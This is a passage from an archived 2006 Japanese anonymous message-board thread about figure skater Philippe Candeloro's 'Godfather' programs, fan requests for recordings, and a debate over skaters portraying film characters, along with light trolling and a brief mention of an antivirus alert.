メッキも禿げました‥‥だからあれほど内容の無いスケーテイングはやめろと‥‥

76 :新(名無しさん)募集中@自治スレ:2006/05/06(土) 01:19:20 ID:jrrhuNGV0
日本人ファンをゆるいお茶漬女の集団だと心の中でバカしてたバチが当たって禿げましたね

77 :新(名無しさん)募集中@自治スレ:2006/05/06(土) 01:37:09 ID:Oy7yU2lb0
ああまだいるのね、もうしばらく放置だな

78 :新(名無しさん)募集中@自治スレ:2006/05/06(土) 09:58:00 ID:AKzxL0dT0
「ゆるいお茶漬女」ってバカにしたの?
なんで?

79 :新(名無しさん)募集中@自治スレ:2006/05/06(土) 12:18:11 ID:YrK/iq0O0
ヒント:>心の中で

80 :新(名無しさん)募集中@自治スレ:2006/05/06(土) 13:59:46 ID:gT7MHuLS0
>>58
よかった、やっと聞ける状態になったみたい。
4部作って具体的には何を指しますか?

94年オリンピックのSPとFS、白髪?とやらは
落としましたが、後は何があるのでしょうか?

81 :新(名無しさん)募集中@自治スレ:2006/05/06(土) 15:31:58 ID:ajkwttvf0
>>80
93-94と94-95のSPとFS。
白髪のゴッドファーザーは4部作の最後で、
演技の終わりに十字架のポーズでゴッドファーザーの死を表現してる。

82 :新(名無しさん)募集中@自治スレ:2006/05/06(土) 15:53:07 ID:gT7MHuLS0
>>81
ありがとう。
そうすると93-94SP→FS→94-95SP→FSの時系列
になっていると思えばいいのですね

ところで、このスレは大丈夫ですか?
実はパソコン詳しくないのでよくわからないのですが、
このスレを開いていた後ウィルスソフトが立ち上がって
危険度高レベルのウィルスを自動削除してくれて
次にこのスレをひらいたら新たに取得した81より前のレスが
全部消えているのですが・・・。
怖いのでレス取得しなおしていませんが、よくあることなのかな

83 :新(名無しさん)募集中@自治スレ:2006/05/06(土) 16:15:16 ID:TB6y2saBO
なぜ安心安全な私の書き込みがww
エラーかなんかだよ。安心しろウイルスはないから。
95のSP持ってる人いませんか?昔動画スレで聞いた時はスルーされてしまったから
聞いてみます。

84 :新(名無しさん)募集中@自治スレ:2006/05/06(土) 17:54:15 ID:gT7MHuLS0
そうですか。安心しました。

94-95のSP、私も欲しいです。
このスレの過去ログにあるFBには、もう無いみたいなので

85 :新(名無しさん)募集中@自治スレ:2006/05/06(土) 23:16:07 ID:WJvTyawD0
>>84
>>62のレスに反応しているだけ
心配ないよ。


86 :新(名無しさん)募集中@自治スレ:2006/05/07(日) 01:25:43 ID:wkLA0V4o0
映画音楽を使用するのはかまわないですが
スケーターがその映画のキャラクターを摸して滑べることに強い違和感があります
フィギュアはスキル+音楽との調和で成り立つ崇高な競技で
その部分で高得点を出せるスキルやスケート技術があるなら
映画音楽を使うにせよ、
なぜそのキャラまでアマスケーターが猿マネする必要があるのでしょう?
自分のスケートに自信があるなら
音楽を咀嚼しうえで自分の技術レベルに合わせて表現すれば
それでよいのでは? なぜ猿マネ?
(村主のピンクパンサーもそうかな?)
これらスキルでは劣り最上位に行けないスケーターにかぎって
映画キャラを借りてミーハーなフィギュアを理解できない観客にアピールし
審査員からあやふやな点を引き出そうとする下心が透けて見えます
フィギュア界でキャンデイロロを誰も尊敬しないのは
彼の能天気な言動からではなく
こうした狡猾さにまわりが皆気づいているからではないでしょうか?

87 :新(名無しさん)募集中@自治スレ:2006/05/07(日) 01:46:23 ID:ZEbIfVn/0
>>86
俺の場合逆にオペラとかバレエは興味ないから
映画音楽のほうが分かりやすくて好きだな
君の意見ではヤグも貶してることになるけど
ヤグにスキルがないとは誰も思わないだろ

88 :新(名無しさん)募集中@自治スレ:2006/05/07(日) 03:18:54 ID:7PcoA9HV0
キャンデロロは映画音楽使ってようと使ってなかろうと
猿マネしてようとしてなかろうと
魅せるスケータだと思うよ
何しても最上位には行けなかったけどさ
ってフィギュアを理解できない私は思う
尊敬はされてないのかね?

89 :新(名無しさん)募集中@自治スレ:2006/05/07(日) 08:35:13 ID:rd9xrPil0
>>86
まだ粘着してるの?w

90 :新(名無しさん)募集中@自治スレ:2006/05/07(日) 09:33:07 ID:DSKQSRDXO
構って欲しいだけだからスルーしようよ。

91 :新(名無しさん)募集中@自治スレ:2006/05/07(日) 18:56:23 ID:HJDgauJ30
映画をもとネタにしたドラマ仕立てってキャンデロロが最初?

92 :新(名無しさん)募集中@自治スレ:2006/05/07(日) 20:37:09 ID:Yepjfzpz0
じゃぁもう曲はオリジナルって規定にしようぜ

93 :新(名無しさん)募集中@自治スレ:2006/05/08(月) 19:34:03 ID:dPpfulV40
お茶漬パワー全開ですね

94 :新(名無しさん)募集中@自治スレ:2006/05/09(火) 19:49:12 ID:0jbIz9oB0
永谷園

95 :新(名無しさん)募集中@自治スレ:2006/05/09(火) 22:12:31 ID:98lsIPGJ0
わかめバンザーイ\(^o^)/

96 :新(名無しさん)募集中@自治スレ:2006/05/10(水) 19:43:22 ID:af6kOP0V0
なまえ、永谷その子。

97 :新(名無しさん)募集中@自治スレ:2006/05/10(水) 19:50:00 ID:VXHHB7JP0
>>86
>こうした狡猾さにまわりが皆気づいているからではないでしょうか?
狡猾さwww

37 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)